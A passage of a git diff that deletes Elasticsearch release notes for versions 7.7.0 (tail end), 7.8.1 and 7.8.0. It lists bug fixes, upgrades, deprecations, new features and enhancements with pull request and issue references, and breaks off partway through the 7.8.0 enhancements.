{es-issue}51020[#51020]) -* Support time_zone on composite's date_histogram {es-pull}51172[#51172] (issues: {es-issue}45199[#45199], {es-issue}45200[#45200]) - -Allocation:: -* Improve performance of shards limits decider {es-pull}53577[#53577] (issue: {es-issue}53559[#53559]) - -Analysis:: -* Mask wildcard query special characters on keyword queries {es-pull}53127[#53127] (issue: {es-issue}46300[#46300]) -* Fix caching for PreConfiguredTokenFilter {es-pull}50912[#50912] (issue: {es-issue}50734[#50734]) - -Audit:: -* Logfile audit settings validation {es-pull}52537[#52537] (issues: {es-issue}47038[#47038], {es-issue}47711[#47711], {es-issue}52357[#52357]) - -Authentication:: -* Fix responses for the token APIs {es-pull}54532[#54532] (issue: {es-issue}53323[#53323]) -* Fix potential bug in concurrent token refresh support {es-pull}53668[#53668] -* Respect runas realm for ApiKey security operations {es-pull}52178[#52178] (issue: {es-issue}51975[#51975]) -* Preserve ApiKey credentials for async verification {es-pull}51244[#51244] -* Don't fallback to anonymous for tokens/apikeys {es-pull}51042[#51042] (issue: {es-issue}50171[#50171]) -* Fail gracefully on invalid token strings {es-pull}51014[#51014] - -Authorization:: -* Explicitly require that delegate API keys have no privileges {es-pull}53647[#53647] -* Allow _rollup_search with read privilege {es-pull}52043[#52043] (issue: {es-issue}50245[#50245]) - -CCR:: -* Clear recent errors when auto-follow successfully {es-pull}54997[#54997] -* Put CCR tasks on (data && remote cluster clients) {es-pull}54146[#54146] (issue: {es-issue}53924[#53924]) -* Handle no such remote cluster exception in ccr {es-pull}53415[#53415] (issue: {es-issue}53225[#53225]) -* Fix shard follow task cleaner under security {es-pull}52347[#52347] (issues: {es-issue}44702[#44702], {es-issue}51971[#51971]) - -CRUD:: -* Force execution of finish shard bulk request {es-pull}51957[#51957] (issue: {es-issue}51904[#51904]) -* Block too many concurrent mapping updates {es-pull}51038[#51038] (issue: {es-issue}50670[#50670]) -* Return 429 status code when there's a read_only cluster block {es-pull}50166[#50166] (issue: {es-issue}49393[#49393]) - -Cluster Coordination:: -* Use special XContent registry for node tool {es-pull}54050[#54050] (issue: {es-issue}53549[#53549]) -* Allow static cluster.max_voting_config_exclusions {es-pull}53717[#53717] (issue: {es-issue}53455[#53455]) -* Allow joining node to trigger term bump {es-pull}53338[#53338] (issue: {es-issue}53271[#53271]) -* Ignore timeouts with single-node discovery {es-pull}52159[#52159] - -Distributed:: -* Execute retention lease syncs under system context {es-pull}53838[#53838] (issues: {es-issue}48430[#48430], {es-issue}53751[#53751]) -* Exclude nested documents in LuceneChangesSnapshot {es-pull}51279[#51279] - -Engine:: -* Update translog policy before the next safe commit {es-pull}54839[#54839] (issue: {es-issue}52223[#52223]) -* Fix doc_stats and segment_stats of ReadOnlyEngine {es-pull}53345[#53345] (issues: {es-issue}51303[#51303], {es-issue}51331[#51331]) -* Do not wrap soft-deletes reader for segment stats {es-pull}51331[#51331] (issues: {es-issue}51192[#51192], {es-issue}51303[#51303]) -* Account soft-deletes in FrozenEngine {es-pull}51192[#51192] (issue: {es-issue}50775[#50775]) -* Fixed an index corruption bug that would occur when applying deletes or updates on an index after it has been shrunk. More details can be found on the https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -Features/CAT APIs:: -* Cat tasks output should respect time display settings {es-pull}54536[#54536] -* Fix NPE in RestPluginsAction {es-pull}52620[#52620] (issue: {es-issue}45321[#45321]) - -Features/ILM+SLM:: -* Ensure error handler is called during SLM retention callback failure {es-pull}55252[#55252] (issue: {es-issue}55217[#55217]) -* Ignore ILM indices in the TerminalPolicyStep {es-pull}55184[#55184] (issue: {es-issue}51631[#51631]) -* Disallow negative TimeValues {es-pull}53913[#53913] (issue: {es-issue}54041[#54041]) -* Fix null config in SnapshotLifecyclePolicy.toRequest {es-pull}53328[#53328] (issues: {es-issue}44465[#44465], {es-issue}53171[#53171]) -* Freeze step retry when not acknowledged {es-pull}53287[#53287] -* Make the set-single-node-allocation retryable {es-pull}52077[#52077] (issue: {es-issue}43401[#43401]) -* Fix the init step to actually be retryable {es-pull}52076[#52076] - -Features/Indices APIs:: -* Read the index.number_of_replicas from template so that wait_for_active_shards is interpreted correctly {es-pull}54231[#54231] - -Features/Ingest:: -* Fix ingest pipeline _simulate api with empty docs never returns a response {es-pull}52937[#52937] (issue: {es-issue}52833[#52833]) -* Handle errors when evaluating if conditions in processors {es-pull}52543[#52543] (issue: {es-issue}52339[#52339]) -* Fix delete enrich policy bug {es-pull}52179[#52179] (issue: {es-issue}51228[#51228]) -* Fix ignore_missing in CsvProcessor {es-pull}51600[#51600] -* Missing suffix for German Month "Juli" in Grok Pattern MONTH {es-pull}51591[#51591] (issue: {es-issue}51579[#51579]) -* Don't overwrite target field with SetSecurityUserProcessor {es-pull}51454[#51454] (issue: {es-issue}51428[#51428]) - -Features/Java High Level REST Client:: -* Add unsupported parameters to HLRC search request {es-pull}53745[#53745] -* Fix AbstractBulkByScrollRequest slices parameter via Rest {es-pull}53068[#53068] (issue: {es-issue}53044[#53044]) -* Send the fields param via body instead of URL params (elastic#42232) {es-pull}48840[#48840] (issues: {es-issue}42232[#42232], {es-issue}42877[#42877]) - -Features/Java Low Level REST Client:: -* Fix roles parsing in client nodes sniffer {es-pull}52888[#52888] (issue: {es-issue}52864[#52864]) - -Features/Monitoring:: -* Fix NPE in cluster state collector for monitoring {es-pull}52371[#52371] (issue: {es-issue}52317[#52317]) - -Features/Stats:: -* Switch to AtomicLong for "IngestCurrent" metric to prevent negative values {es-pull}52581[#52581] (issues: {es-issue}52406[#52406], {es-issue}52411[#52411]) - -Features/Watcher:: -* Disable Watcher script optimization for stored scripts {es-pull}53497[#53497] (issue: {es-issue}40212[#40212]) -* The watcher indexing listener didn't handle document level exceptions. {es-pull}51466[#51466] (issue: {es-issue}32299[#32299]) - -Geo:: -* Handle properly indexing rectangles that crosses the dateline {es-pull}53810[#53810] - -Highlighting:: -* Fix highlighter support in PinnedQuery and added test {es-pull}53716[#53716] (issue: {es-issue}53699[#53699]) - -Infra/Core:: -* Make feature usage version aware {es-pull}55246[#55246] (issues: {es-issue}44589[#44589], {es-issue}55248[#55248]) -* Avoid StackOverflowError if write circular reference exception {es-pull}54147[#54147] (issue: {es-issue}53589[#53589]) -* Fix Joda compatibility in stream protocol {es-pull}53823[#53823] (issue: {es-issue}53586[#53586]) -* Avoid self-suppression on grouped action listener {es-pull}53262[#53262] (issue: {es-issue}53174[#53174]) -* Ignore virtual ethernet devices that disappear {es-pull}51581[#51581] (issue: {es-issue}49914[#49914]) -* Fix ingest timezone logic {es-pull}51215[#51215] (issue: {es-issue}51108[#51108]) - -Infra/Logging:: -* Fix LoggingOutputStream to work on windows {es-pull}51779[#51779] (issue: {es-issue}51532[#51532]) - -Infra/Packaging:: -* Handle special characters and spaces in JAVA_HOME path in elasticsearch-service.bat {es-pull}52676[#52676] -* Limit _FILE env var support to specific vars {es-pull}52525[#52525] (issue: {es-issue}52503[#52503]) -* Always set default ES_PATH_CONF for package scriptlets {es-pull}51827[#51827] (issues: {es-issue}50246[#50246], {es-issue}50631[#50631]) - -Infra/Plugins:: -* Ensure only plugin REST tests are run for plugins {es-pull}53184[#53184] (issues: {es-issue}52114[#52114], {es-issue}53183[#53183]) - -Machine Learning:: -* Fix node serialization on GET df-nalytics stats without id {es-pull}54808[#54808] (issue: {es-issue}54807[#54807]) -* Allow force stopping failed and stopping DF analytics {es-pull}54650[#54650] -* Take more care that normalize processes use unique named pipes {es-pull}54636[#54636] (issue: {es-issue}43830[#43830]) -* Do not fail Evaluate API when the actual and predicted fields' types differ {es-pull}54255[#54255] (issue: {es-issue}54079[#54079]) -* Get ML filters size should default to 100 {es-pull}54207[#54207] (issues: {es-issue}39976[#39976], {es-issue}54206[#54206]) -* Introduce a "starting" datafeed state for lazy jobs {es-pull}53918[#53918] (issue: {es-issue}53763[#53763]) -* Only retry persistence failures when the failure is intermittent and stop retrying when analytics job is stopping {es-pull}53725[#53725] (issue: {es-issue}53687[#53687]) -* Fix number inference models returned in x-pack info API {es-pull}53540[#53540] -* Make classification evaluation metrics work when there is field mapping type mismatch {es-pull}53458[#53458] (issue: {es-issue}53485[#53485]) -* Perform evaluation in multiple steps when necessary {es-pull}53295[#53295] -* Specifying missing_field_value value and using it instead of empty_string {es-pull}53108[#53108] (issue: {es-issue}1034[#1034]) -* Use event.timezone in ingest pipeline from find_file_structure {es-pull}52720[#52720] (issue: {es-issue}9458[#9458]) -* Better error when persistent task assignment disabled {es-pull}52014[#52014] (issue: {es-issue}51956[#51956]) -* Fix possible race condition starting datafeed {es-pull}51646[#51646] (issues: {es-issue}50886[#50886], {es-issue}51302[#51302]) -* Fix possible race condition when starting datafeed {es-pull}51302[#51302] (issue: {es-issue}51285[#51285]) -* Address two edge cases for categorization.GrokPatternCreator#findBestGrokMatchFromExamples {es-pull}51168[#51168] -* Calculate results and snapshot retention using latest bucket timestamps {es-pull}51061[#51061] -* Use largest ordered subset of categorization tokens for category reverse -search regex {ml-pull}970[#970] (issue: {ml-issue}949[#949]) -* Account for the data frame's memory when estimating the peak memory used by -classification and regression model training {ml-pull}996[#996] -* Rename classification and regression parameter maximum_number_trees to -max_trees {ml-pull}1047[#1047] - -Mapping:: -* Throw better exception on wrong `dynamic_templates` syntax {es-pull}51783[#51783] (issue: {es-issue}51486[#51486]) - -Network:: -* Add support for more named curves {es-pull}55179[#55179] (issue: {es-issue}55031[#55031]) -* Allow proxy mode server name to be updated {es-pull}54107[#54107] -* Invoke response handler on failure to send {es-pull}53631[#53631] -* Do not log no-op reconnections at DEBUG {es-pull}53469[#53469] -* Fix RemoteConnectionManager size() method {es-pull}52823[#52823] (issue: {es-issue}52029[#52029]) -* Remove seeds dependency for remote cluster settings {es-pull}52796[#52796] -* Add host address to BindTransportException message {es-pull}51269[#51269] (issue: {es-issue}48001[#48001]) - -Percolator:: -* Test percolate queries using `NOW` and sorting {es-pull}52758[#52758] (issues: {es-issue}52618[#52618], {es-issue}52748[#52748]) -* Don't index ranges including `NOW` in percolator {es-pull}52748[#52748] (issue: {es-issue}52617[#52617]) - -Reindex:: -* Negative TimeValue fix {es-pull}54057[#54057] (issue: {es-issue}53913[#53913]) -* Allow comma separated source indices {es-pull}52044[#52044] (issue: {es-issue}51949[#51949]) - -SQL:: -* Fix ODBC metadata for DATE & TIME data types {es-pull}55316[#55316] (issue: {es-issue}41086[#41086]) -* Fix NPE for parameterized LIKE/RLIKE {es-pull}53573[#53573] (issue: {es-issue}53557[#53557]) -* Add support for index aliases for SYS COLUMNS command {es-pull}53525[#53525] (issue: {es-issue}31609[#31609]) -* Fix issue with LIKE/RLIKE as painless script {es-pull}53495[#53495] (issue: {es-issue}53486[#53486]) -* Fix column size for IP data type {es-pull}53056[#53056] (issue: {es-issue}52762[#52762]) -* Fix sql cli sourcing of x-pack-env {es-pull}52613[#52613] (issue: {es-issue}47803[#47803]) -* Supplement input checks on received request parameters {es-pull}52229[#52229] -* Fix issue with timezone when paginating {es-pull}52101[#52101] (issue: {es-issue}51258[#51258]) -* Fix ORDER BY on aggregates and GROUPed BY fields {es-pull}51894[#51894] (issue: {es-issue}50355[#50355]) -* Fix milliseconds handling in intervals {es-pull}51675[#51675] (issue: {es-issue}41635[#41635]) -* Fix ORDER BY YEAR() function {es-pull}51562[#51562] (issue: {es-issue}51224[#51224]) -* Change the way unsupported data types fields are handled {es-pull}50823[#50823] -* Selecting a literal from grouped by query generates error {es-pull}41964[#41964] (issues: {es-issue}41413[#41413], {es-issue}41951[#41951]) - -Search:: -* Improve robustness of Query Result serializations {es-pull}54692[#54692] (issue: {es-issue}54665[#54665]) -* Fix Term Vectors with artificial docs and keyword fields {es-pull}53504[#53504] (issue: {es-issue}53494[#53494]) -* Fix concurrent requests race over scroll context limit {es-pull}53449[#53449] -* Fix pre-sorting of shards in the can_match phase {es-pull}53397[#53397] -* Fix potential NPE in FuzzyTermsEnum {es-pull}53231[#53231] (issue: {es-issue}52894[#52894]) -* Fix inaccurate total hit count in _search/template api {es-pull}53155[#53155] (issue: {es-issue}52801[#52801]) -* Harden search context id {es-pull}53143[#53143] -* Correct boost in `script_score` query and error on negative scores {es-pull}52478[#52478] (issue: {es-issue}48465[#48465]) - -Snapshot/Restore:: -* Exclude Snapshot Shard Status Update Requests from Circuit Breaker {es-pull}55376[#55376] (issue: {es-issue}54714[#54714]) -* Fix Snapshot Completion Listener Lost on Master Failover {es-pull}54286[#54286] -* Fix Non-Verbose Snapshot List Missing Empty Snapshots {es-pull}52433[#52433] -* Fix Inconsistent Shard Failure Count in Failed Snapshots {es-pull}51416[#51416] (issue: {es-issue}47550[#47550]) -* Fix Overly Aggressive Request DeDuplication {es-pull}51270[#51270] (issue: {es-issue}51253[#51253]) - -Store:: -* Fix synchronization in ByteSizeCachingDirectory {es-pull}52512[#52512] - -Transform:: -* Fixing naming in HLRC and _cat to match API content {es-pull}54300[#54300] (issue: {es-issue}53946[#53946]) -* Transform optmize date histogram {es-pull}54068[#54068] (issue: {es-issue}54254[#54254]) -* Add version guards around Transform hidden index settings {es-pull}54036[#54036] (issue: {es-issue}53931[#53931]) -* Fix NPE in derive stats if shouldStopAtNextCheckpoint is set {es-pull}52940[#52940] -* Fix mapping deduction for scaled_float {es-pull}51990[#51990] (issue: {es-issue}51780[#51780]) -* Fix stats can return old state information if security is enabled {es-pull}51732[#51732] (issue: {es-issue}51728[#51728]) - - - -[[upgrade-7.7.0]] -[discrete] -=== Upgrades - -Authentication:: -* Update oauth2-oidc-sdk to 7.0 {es-pull}52489[#52489] (issue: {es-issue}48409[#48409]) - -Engine:: -* Upgrade to lucene 8.5.0 release {es-pull}54077[#54077] -* Upgrade to final lucene 8.5.0 snapshot {es-pull}53293[#53293] -* Upgrade to Lucene 8.5.0-snapshot-c4475920b08 {es-pull}52950[#52950] - -Features/Ingest:: -* Upgrade Tika to 1.24 {es-pull}54130[#54130] (issue: {es-issue}52402[#52402]) - -Infra/Core:: -* Upgrade the bundled JDK to JDK 14 {es-pull}53748[#53748] (issue: {es-issue}53575[#53575]) -* Upgrade to Jackson 2.10.3 {es-pull}53523[#53523] (issues: {es-issue}27032[#27032], {es-issue}45225[#45225]) -* Update jackson-databind to 2.8.11.6 {es-pull}53522[#53522] (issue: {es-issue}45225[#45225]) - -Infra/Packaging:: -* Upgrade the bundled JDK to JDK 13.0.2 {es-pull}51511[#51511] - -Security:: -* Update BouncyCastle to 1.64 {es-pull}52185[#52185] - -Snapshot/Restore:: -* Upgrade GCS Dependency to 1.106.0 {es-pull}54092[#54092] -* Upgrade to AWS SDK 1.11.749 {es-pull}53962[#53962] (issue: {es-issue}53191[#53191]) -* Upgrade to Azure SDK 8.6.2 {es-pull}53865[#53865] -* Upgrade GCS SDK to 1.104.0 {es-pull}52839[#52839] diff --git a/docs/reference/release-notes/7.8.asciidoc b/docs/reference/release-notes/7.8.asciidoc deleted file mode 100644 index 71e15b86368..00000000000 --- a/docs/reference/release-notes/7.8.asciidoc +++ /dev/null @@ -1,499 +0,0 @@ -[[release-notes-7.8.1]] -== {es} version 7.8.1 - -Also see <>. - -[[known-issues-7.8.1]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[breaking-7.8.1]] -[discrete] -=== Breaking changes - -License:: -* Display enterprise license as platinum in /_xpack {es-pull}58217[#58217] - - - -[[feature-7.8.1]] -[discrete] -=== New features - -SQL:: -* Implement SUM, MIN, MAX, AVG over literals {es-pull}56786[#56786] (issues: {es-issue}41412[#41412], {es-issue}55569[#55569]) - - - -[[enhancement-7.8.1]] -[discrete] -=== Enhancements - -Authorization:: -* Add read privileges for observability-annotations for apm_user {es-pull}58530[#58530] (issues: {es-issue}64796[#64796], {es-issue}69642[#69642], {es-issue}69881[#69881]) - -Features/Indices APIs:: -* Change "apply create index" log level to DEBUG {es-pull}56947[#56947] -* Make noop template updates be cluster state noops {es-pull}57851[#57851] (issue: {es-issue}57662[#57662]) -* Rename template V2 classes to ComposableTemplate {es-pull}57183[#57183] (issue: {es-issue}56609[#56609]) - -Machine Learning:: -* Add exponent output aggregator to inference {es-pull}58933[#58933] - -Snapshot/Restore:: -* Allow read operations to be executed without waiting for full range to be written in cache {es-pull}58728[#58728] (issues: {es-issue}58164[#58164], {es-issue}58477[#58477]) -* Allows SparseFileTracker to progressively execute listeners during Gap processing {es-pull}58477[#58477] (issue: {es-issue}58164[#58164]) -* Do not wrap CacheFile reentrant r/w locks with ReleasableLock {es-pull}58244[#58244] (issue: {es-issue}58164[#58164]) -* Use snapshot information to build searchable snapshot store MetadataSnapshot {es-pull}56289[#56289] - -Transform:: -* Improve update API {es-pull}57648[#57648] (issue: {es-issue}56499[#56499]) - - - -[[bug-7.8.1]] -[discrete] -=== Bug fixes - -CCR:: -* Ensure CCR partial reads never overuse buffer {es-pull}58620[#58620] - -Cluster Coordination:: -* Suppress cluster UUID logs in 6.8/7.x upgrade {es-pull}56835[#56835] -* Timeout health API on busy master {es-pull}57587[#57587] - -Engine:: -* Fix realtime get of numeric fields from translog {es-pull}58121[#58121] (issue: {es-issue}57462[#57462]) - -Features/ILM+SLM:: -* Fix negative limiting with fewer PARTIAL snapshots than minimum required {es-pull}58563[#58563] (issue: {es-issue}58515[#58515]) - -Features/Indices APIs:: -* Fix issue reading template mappings after cluster restart {es-pull}58964[#58964] (issues: {es-issue}58521[#58521], {es-issue}58643[#58643], {es-issue}58883[#58883]) -* ITV2: disallow duplicate dynamic templates {es-pull}56291[#56291] (issues: {es-issue}28988[#28988], {es-issue}53101[#53101], {es-issue}53326[#53326]) - - -Features/Stats:: -* Fix unnecessary stats warning when swap is disabled {es-pull}57983[#57983] - -Geo:: -* Fix max-int limit for number of points reduced in geo_centroid {es-pull}56370[#56370] (issue: {es-issue}55992[#55992]) -* Re-enable support for array-valued geo_shape fields. {es-pull}58786[#58786] - -Infra/Core:: -* Week based parsing for ingest date processor {es-pull}58597[#58597] (issue: {es-issue}58479[#58479]) - -Machine Learning:: -* Allow unran/incomplete forecasts to be deleted for stopped/failed jobs {es-pull}57152[#57152] (issue: {es-issue}56419[#56419]) -* Fix inference .ml-stats-write alias creation {es-pull}58947[#58947] (issue: {es-issue}58662[#58662]) -* Fix race condition when force stopping data frame analytics job {es-pull}57680[#57680] -* Handle broken setup with state alias being an index {es-pull}58999[#58999] (issue: {es-issue}58482[#58482]) -* Mark forecasts for force closed/failed jobs as failed {es-pull}57143[#57143] (issue: {es-issue}56419[#56419]) -* Better interrupt handling during named pipe connection {ml-pull}1311[#1311] -* Trap potential cause of SIGFPE {ml-pull}1351[#1351] (issue: {ml-issue}1348[#1348]) -* Correct inference model definition for MSLE regression models {ml-pull}1375[#1375] -* Fix cause of SIGSEGV of classification and regression {ml-pull}1379[#1379] -* Fix restoration of change detectors after seasonality change {ml-pull}1391[#1391] -* Fix potential SIGSEGV when forecasting {ml-pull}1402[#1402] (issue: {ml-issue}1401[#1401]) - -Network:: -* Close channel on handshake error with old version {es-pull}56989[#56989] (issue: {es-issue}54337[#54337]) - -Percolator:: -* Fix nested document support in percolator query {es-pull}58149[#58149] (issue: {es-issue}52850[#52850]) - -Recovery:: -* Fix recovery stage transition with sync_id {es-pull}57754[#57754] (issues: {es-issue}57187[#57187], {es-issue}57708[#57708]) - -SQL:: -* Fix behaviour of COUNT(DISTINCT ) {es-pull}56869[#56869] -* Fix bug in resolving aliases against filters {es-pull}58399[#58399] (issues: {es-issue}57270[#57270], {es-issue}57417[#57417]) -* Fix handling of escaped chars in JDBC connection string {es-pull}58429[#58429] (issue: {es-issue}57927[#57927]) -* Handle MIN and MAX functions on dates in Painless scripts {es-pull}57605[#57605] (issue: {es-issue}57581[#57581]) - -Search:: -* Ensure search contexts are removed on index delete {es-pull}56335[#56335] -* Filter empty fields in SearchHit#toXContent {es-pull}58418[#58418] (issue: {es-issue}41656[#41656]) -* Fix exists query on unmapped field in query_string {es-pull}58804[#58804] (issues: {es-issue}55785[#55785], {es-issue}58737[#58737]) -* Fix handling of terminate_after when size is 0 {es-pull}58212[#58212] (issue: {es-issue}57624[#57624]) -* Fix possible NPE on search phase failure {es-pull}57952[#57952] (issues: {es-issue}51708[#51708], {es-issue}57945[#57945]) -* Handle failures with no explicit cause in async search {es-pull}58319[#58319] (issues: {es-issue}57925[#57925], {es-issue}58311[#58311]) -* Improve error handling in async search code {es-pull}57925[#57925] (issue: {es-issue}58995[#58995]) -* Prevent BigInteger serialization errors in term queries {es-pull}57987[#57987] (issue: {es-issue}57917[#57917]) -* Submit async search to not require read privilege {es-pull}58942[#58942] - -Snapshot/Restore:: -* Fix Incorrect Snapshot Shar Status for DONE Shards in Running Snapshots {es-pull}58390[#58390] -* Fix Memory Leak From Master Failover During Snapshot {es-pull}58511[#58511] (issue: {es-issue}56911[#56911]) -* Fix NPE in SnapshotService CS Application {es-pull}58680[#58680] -* Fix Snapshot Abort Not Waiting for Data Nodes {es-pull}58214[#58214] -* Remove Overly Strict Safety Mechnism in Shard Snapshot Logic {es-pull}57227[#57227] (issue: {es-issue}57198[#57198]) - -Task Management:: -* Cancel persistent task recheck when no longer master {es-pull}58539[#58539] (issue: {es-issue}58531[#58531]) -* Ensure unregister child node if failed to register task {es-pull}56254[#56254] (issues: {es-issue}54312[#54312], {es-issue}55875[#55875]) - -Transform:: -* Fix page size return in cat transform, add dps {es-pull}57871[#57871] (issues: {es-issue}56007[#56007], {es-issue}56498[#56498]) - - - -[[upgrade-7.8.1]] -[discrete] -=== Upgrades - -Infra/Core:: -* Upgrade to JNA 5.5.0 {es-pull}58183[#58183] - - -[[release-notes-7.8.0]] -== {es} version 7.8.0 - -Also see <>. - -[[known-issues-7.8.0]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -[[breaking-7.8.0]] -[discrete] -=== Breaking changes - -Aggregations:: -* `value_count` aggregation optimization {es-pull}54854[#54854] - -Features/Indices APIs:: -* Add auto create action {es-pull}55858[#55858] - -Mapping:: -* Disallow changing 'enabled' on the root mapper {es-pull}54463[#54463] (issue: {es-issue}33933[#33933]) -* Fix updating include_in_parent/include_in_root of nested field {es-pull}54386[#54386] (issue: {es-issue}53792[#53792]) - - -[[deprecation-7.8.0]] -[discrete] -=== Deprecations - -Authentication:: -* Deprecate the `kibana` reserved user; introduce `kibana_system` user {es-pull}54967[#54967] - -Cluster Coordination:: -* Voting config exclusions should work with absent nodes {es-pull}50836[#50836] (issue: {es-issue}47990[#47990]) - -Features/Features:: -* Add node local storage deprecation check {es-pull}54383[#54383] (issue: {es-issue}54374[#54374]) - -Features/Indices APIs:: -* Deprecate local parameter for get field mapping request {es-pull}55014[#55014] - -Infra/Core:: -* Deprecate node local storage setting {es-pull}54374[#54374] - -Infra/Plugins:: -* Add xpack setting deprecations to deprecation API {es-pull}56290[#56290] (issue: {es-issue}54745[#54745]) -* Deprecate disabling basic-license features {es-pull}54816[#54816] (issue: {es-issue}54745[#54745]) -* Deprecated xpack "enable" settings should be no-ops {es-pull}55416[#55416] (issues: {es-issue}54745[#54745], {es-issue}54816[#54816]) -* Make xpack.ilm.enabled setting a no-op {es-pull}55592[#55592] (issues: {es-issue}54745[#54745], {es-issue}54816[#54816], {es-issue}55416[#55416]) -* Make xpack.monitoring.enabled setting a no-op {es-pull}55617[#55617] (issues: {es-issue}54745[#54745], {es-issue}54816[#54816], {es-issue}55416[#55416], {es-issue}55461[#55461], {es-issue}55592[#55592]) -* Restore xpack.ilm.enabled and xpack.slm.enabled settings {es-pull}57383[#57383] (issues: {es-issue}54745[#54745], {es-issue}55416[#55416], {es-issue}55592[#55592]) - - - -[[feature-7.8.0]] -[discrete] -=== New features - -Aggregations:: -* Add Student's t-test aggregation support {es-pull}54469[#54469] (issue: {es-issue}53692[#53692]) -* Add support for filters to t-test aggregation {es-pull}54980[#54980] (issue: {es-issue}53692[#53692]) -* Histogram field type support for Sum aggregation {es-pull}55681[#55681] (issue: {es-issue}53285[#53285]) -* Histogram field type support for ValueCount and Avg aggregations {es-pull}55933[#55933] (issue: {es-issue}53285[#53285]) - -Features/Indices APIs:: -* Add simulate template composition API _index_template/_simulate_index/{name} {es-pull}55686[#55686] (issue: {es-issue}53101[#53101]) - -Geo:: -* Add geo_bounds aggregation support for geo_shape {es-pull}55328[#55328] -* Add geo_shape support for geotile_grid and geohash_grid {es-pull}55966[#55966] -* Add geo_shape support for the geo_centroid aggregation {es-pull}55602[#55602] -* Add new point field {es-pull}53804[#53804] - -SQL:: -* Implement DATETIME_FORMAT function for date/time formatting {es-pull}54832[#54832] (issue: {es-issue}53714[#53714]) -* Implement DATETIME_PARSE function for parsing strings {es-pull}54960[#54960] (issue: {es-issue}53714[#53714]) -* Implement scripting inside aggs {es-pull}55241[#55241] (issues: {es-issue}29980[#29980], {es-issue}36865[#36865], {es-issue}37271[#37271]) - - - -[[enhancement-7.8.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Aggs must specify a `field` or `script` (or both) {es-pull}52226[#52226] -* Expose aggregation usage in Feature Usage API {es-pull}55732[#55732] (issue: {es-issue}53746[#53746]) -* Reduce memory for big aggregations run against many shards {es-pull}54758[#54758] -* Save memory in on aggs in async search {es-pull}55683[#55683] - -Allocation:: -* Disk decider respect watermarks for single data node {es-pull}55805[#55805] -* Improve same-shard allocation explanations {es-pull}56010[#56010] - -Analysis:: -* Add preserve_original setting in ngram token filter {es-pull}55432[#55432] -* Add preserve_original setting in edge ngram token filter {es-pull}55766[#55766] (issue: {es-issue}55767[#55767]) -* Add pre-configured “lowercase” normalizer {es-pull}53882[#53882] (issue: {es-issue}53872[#53872]) - -Audit:: -* Update the audit logfile list of system users {es-pull}55578[#55578] (issue: {es-issue}37924[#37924]) - -Authentication:: -* Let realms gracefully terminate the authN chain {es-pull}55623[#55623] - -Authorization:: -* Add reserved_ml_user and reserved_ml_admin kibana privileges {es-pull}54713[#54713] - -Autoscaling:: -* Rollover: refactor out cluster state update {es-pull}53965[#53965] - -CRUD:: -* Avoid holding onto bulk items until all completed {es-pull}54407[#54407] - -Cluster Coordination:: -* Add voting config exclusion add and clear API spec and integration test cases {es-pull}55760[#55760] (issue: {es-issue}48131[#48131]) - -Features/CAT APIs:: -* Add support for V2 index templates to /_cat/templates {es-pull}55829[#55829] (issue: {es-issue}53101[#53101]) - -Features/Indices APIs:: -* Add HLRC support for simulate index template api {es-pull}55936[#55936] (issue: {es-issue}53101[#53101]) -* Add prefer_v2_templates flag and index setting {es-pull}55411[#55411] (issue: {es-issue}53101[#53101]) -* Add warnings/errors when V2 templates would match same indices as V1 {es-pull}54367[#54367] (issue: {es-issue}53101[#53101]) -* Disallow merging existing mapping field definitions in templates {es-pull}57701[#57701] (issues: {es-issue}55607[#55607], {es-issue}55982[#55982], {es-issue}57393[#57393]) -* Emit deprecation warning if multiple v1 templates match with a new index {es-pull}55558[#55558] (issue: {es-issue}53101[#53101]) -* Guard adding the index.prefer_v2_templates settings for pre-7.8 nodes {es-pull}55546[#55546] (issues: {es-issue}53101[#53101], {es-issue}55411[#55411], {es-issue}55539[#55539]) -* Handle merging dotted object names when merging V2 template mappings {es-pull}55982[#55982] (issue: {es-issue}53101[#53101]) -* Throw exception on duplicate mappings metadata fields when merging templates {es-pull}57835[#57835] (issue: {es-issue}57701[#57701]) -* Update template v2 api rest spec {es-pull}55948[#55948] (issue: {es-issue}53101[#53101]) -* Use V2 index templates during index creation {es-pull}54669[#54669] (issue: {es-issue}53101[#53101]) -* Use V2 templates when reading duplicate aliases and ingest pipelines {es-pull}54902[#54902] (issue: {es-issue}53101[#53101]) -* Validate V2 templates more strictly {es-pull}56170[#56170] (issues: {es-issue}43737[#43737], {es-issue}46045[#46045], {es-issue}53101[#53101], {es-issue}53970[#53970]) - -Features/Java High Level REST Client:: -* Enable support for decompression of compressed response within RestHighLevelClient {es-pull}53533[#53533] - -Features/Stats:: -* Fix available / total disk cluster stats {es-pull}32480[#32480] (issue: {es-issue}32478[#32478]) - -Features/Watcher:: -* Delay warning about missing x-pack {es-pull}54265[#54265] (issue: {es-issue}40898[#40898]) - -Geo:: -* Add geo_shape mapper supporting doc-values in Spatial Plugin {es-pull}55037[#55037] (issue: {es-issue}53562[#53562]) - -Infra/Core:: -* Decouple Environment from DiscoveryNode {es-pull}54373[#54373] -* Ensure that the output of node roles are sorted {es-pull}54376[#54376] (issue: {es-issue}54370[#54370]) -* Reintroduce system index APIs for Kibana {es-pull}54858[#54858] (issues: {es-issue}52385[#52385], {es-issue}53912[#53912]) -* Schedule commands in current thread context {es-pull}54187[#54187] (issue: {es-issue}17143[#17143]) -* Start resource watcher service early {es-pull}54993[#54993] (issue: {es-issue}54867[#54867]) - -Infra/Packaging:: -* Make Windows JAVA_HOME handling consistent with Linux {es-pull}55261[#55261] (issue: {es-issue}55134[#55134]) - - -Infra/REST API:: -* Add validation to the usage service {es-pull}54617[#54617] - -Infra/Scripting:: -* Scripting: stats per context in nodes stats {es-pull}54008[#54008] (issue: {es-issue}50152[#50152]) - -Machine Learning:: -* Add effective max model memory limit to ML info {es-pull}55529[#55529] (issue: {es-issue}63942[#63942]) -* Add loss_function to regression {es-pull}56118[#56118] 